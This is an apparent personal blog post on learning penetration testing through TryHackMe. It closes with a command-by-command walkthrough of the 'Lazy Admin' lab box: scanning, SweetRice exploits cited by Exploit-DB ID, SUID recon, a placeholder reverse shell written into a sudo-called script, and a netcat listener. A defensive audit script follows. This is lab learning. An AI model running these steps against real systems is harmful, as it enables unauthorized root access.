Cybersecurity study


I have been grinding cybersecurity learnings at the start of 2026 because I am bored and want to learn more about the ecosystem. To do this, I signed up for TryHackMe, which is a platform that has both courses and challenges for learning things from the basics of networking all the way to privilege escalation on Linux or Windows.


I joined the "Jr. Penetration Tester" learning path and completed it in about 30 days. I would recommend this to any web/app developer. It gives you new ways to think about your application (how it can be abused) while also deepening your knowledge of infrastructure and things you may not typically deal with if you are not part of a small team or DevOps (Linux users, file permissions, etc).


Learning #1 - Knowledge is infinite, we are not


You do not know how much you do not know. The topics in cybersecurity are so broad. You have to understand how operating systems work, web applications, details of an application's plugin ecosystem, etc. It is an all-encompassing knowledge base that you need to keep up with (or be able to learn quickly) in order to be effective.


Getting hands-on with this information is a great way to challenge your brain to think out of the box. You find ways to use the tools and knowledge in different unique situations. I have found that it feels more like an art than a science when poking around on a target application/server.


Learning #2 - Tools everywhere


A tool called Metasploit makes it trivial to set up an entire chain of actions from recon and access to exploiting targets by their OS and services. Burp Suite provides a lot of the tools you would need in an interface to reverse-engineer and attack web applications. Both of these are free.


The tools are there, but without a fundamental understanding of the basics you do not have a chance at being effective. For example, some exploits can be quite complex and you should understand what is happening under the hood before you run them (or craft them). Otherwise, you could wreck the target machine or break rules for the pentest (rate limits, scope, etc).


An entry level challenge on THM might require the usage of the following tools:

- nmap

- dirbuster

- johntheripper

- netcat

- find

- http.server python module


Learning #3 - CVE + Exploit DB


The exploit eco-system is interesting and relatively easy to dive into. As I went through the learnings and challenges I found myself constantly reaching for the following resources:

- exploit[dash]db[dot]com

- searchsploit (simple way to use payloads from exploit db)

- msfvenom or msfconsole to create/search payloads

- github (search CVE)

- NIST vuln db


For example, you search something like "SweetRice" in exploit db, and it will list verified exploits for that application framework (versions are very important). Again, you might have to tweak the usage of the exploit for your unique situation - but it can give you the shape of your attack vector.


Final thoughts


I feel like I am using a different part of the brain when going through some of these challenges on THM. They require a systematic approach with an open mind. I enjoy digging through information and learning as much as I possibly can about these systems that lie beneath the naked eye.


Onward!


Post-post example


Here is how I solved a recent beginners challenge on THM (Lazy Admin box).

# 1. discover services
nmap -sS <target>

# 2. found web applications, discover routes
dirbuster <target> --wordlist=<some word list>

# 3. recon routes manually
# 4. discover application is SweetRice CMS, find version
# 5. research exploit db for app exploits
# 6. discover EID: 40718 (db backup disclosure), download sql backup file
# 7. Login as admin
# 8. exploit EID: 40700, add a malicious ad that executes PHP code to execute commands on the server

# 9. recon of server might use these commands
find / -type f -perm /4000 2>/dev/null   # files with the SUID bit set (sbit)
find / -type d -writable 2>/dev/null
ls -la /home
sudo -l

# FLAG FOUND: /home/itguy/flag.txt

# 10. you find that you can run /usr/bin/perl as root, and that another user has a script that calls /etc/copy.sh which you can edit

# 11. Via EID: 40700 you run this command to edit /etc/copy.sh
echo "<reverse shell payload>" > /etc/copy.sh

# 12. On attack machine set up to catch shell
nc -lnvp 9000

# 13. execute /etc/copy.sh on target machine with perl sudo access
sudo /usr/bin/perl /home/itguy/backup.pl

# 14. you now have a root shell caught by your attack machine:
whoami   # root
find / -name root.txt 2>/dev/null

# FLAG FOUND
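
The root cause in steps 10 to 13 is a sudo rule whose script calls a file that non-root users can edit. As an added example (not part of the original post), this shell function audits such a chain from the defender's side; the function names, the TRUSTED_UID parameter and the sample files are assumptions constructed for illustration.

```shell
#!/bin/sh
# Added example, not from the original post. Function names and the
# TRUSTED_UID parameter are hypothetical; pass 0 (root only) on a real host.

# untrusted PATH TRUSTED_UID: true if PATH is group- or world-writable, or is
# owned by anyone other than root or TRUSTED_UID.
untrusted() {
    [ -n "$(find -H "$1" -prune \( -perm -0002 -o -perm -0020 -o \
        \( ! -user 0 ! -user "$2" \) \) -print 2>/dev/null)" ]
}

# audit_sudo_script SCRIPT [TRUSTED_UID]: print one FINDING line per weak link
# and return 1 if any exist, 0 if the chain is clean.
audit_sudo_script() {
    script=$1; trusted=${2:-0}; rc=0
    # Whoever can write the script or its directory controls what root runs.
    for target in "$script" "$(dirname "$script")"; do
        if untrusted "$target" "$trusted"; then
            echo "FINDING sudo target modifiable: $target"; rc=1
        fi
    done
    # Absolute paths named in the script are files it runs or reads as root.
    for target in $(grep -oE '/[A-Za-z0-9._/-]+' "$script" | sort -u); do
        [ -e "$target" ] || continue
        if untrusted "$target" "$trusted"; then
            echo "FINDING referenced path modifiable: $target"; rc=1
        fi
    done
    return "$rc"
}

# Constructed sample: a root-run wrapper that calls a world-writable helper,
# the same shape as backup.pl calling /etc/copy.sh in the walkthrough.
demo() {
    dir=$(mktemp -d) || return 1
    printf 'system("sh", "%s/copy.sh");\n' "$dir" > "$dir/backup.pl"
    printf 'echo backup\n' > "$dir/copy.sh"
    chmod 644 "$dir/backup.pl"; chmod 777 "$dir/copy.sh"
    audit_sudo_script "$dir/backup.pl" "$(id -u)" || echo "chain is modifiable"
    chmod 755 "$dir/copy.sh"                 # the fix: drop group/world write
    audit_sudo_script "$dir/backup.pl" "$(id -u)" && echo "clean after chmod 755"
    rm -rf "$dir"
}
demo
```

On a real host, run `audit_sudo_script` against each script path listed by `sudo -l` with the default trusted UID of 0.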